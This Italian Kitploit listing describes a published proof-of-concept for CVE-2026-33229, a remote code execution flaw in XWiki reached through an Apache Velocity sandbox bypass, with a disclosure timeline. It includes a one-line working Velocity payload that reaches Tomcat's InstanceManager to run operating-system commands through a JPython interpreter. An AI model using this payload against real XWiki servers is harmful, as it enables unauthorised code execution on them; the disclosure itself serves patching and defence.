Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33229 — Proof-of-concept exploit per CVE-2026-33229, una RCE su XWiki tramite bypass della sandbox di Apache Velocity, con dettagli tecnici e un payload funzionante. | Kitploit
Strumenti/GitHubGitHub/azefzafyoussef/cve-2026-33229
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSviluppo Payload
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

Proof-of-concept exploit per CVE-2026-33229, una RCE su XWiki tramite bypass della sandbox di Apache Velocity, con dettagli tecnici e un payload funzionante.

Vedi Repository
45 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33229 — RCE su XWiki tramite bypass della sandbox Apache Velocity

CVE Severity Status

Una vulnerabilità di Remote Code Execution in XWiki Platform che consente a un utente autenticato con permessi di scripting di bypassare completamente la sandbox di Apache Velocity — senza bisogno di Java Reflection — attraversando oggetti pre-istanziati già presenti nel contesto Velocity.

📄 Dettagli tecnici completi: youssefazefzaf.com/posts/cve


Dettagli

CampoValore
ID CVECVE-2026-33229
Prodotto interessatoXWiki Platform
ComponenteRenderer macro Velocity, parametro titolo pagina
Privilegi richiestiAutenticato + permesso Script
ImpattoRemote Code Execution
GHSAGHSA-h259-74h5-4rh9
Scoperta7 novembre 2025
Corretta10 dicembre 2025
Divulgata8 aprile 2026

Proof of Concept

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

Nota sulla divulgazione responsabile: PoC pubblicato dopo la disponibilità della patch. Non utilizzare contro sistemi di cui non si è proprietari.

Scarica lo strumento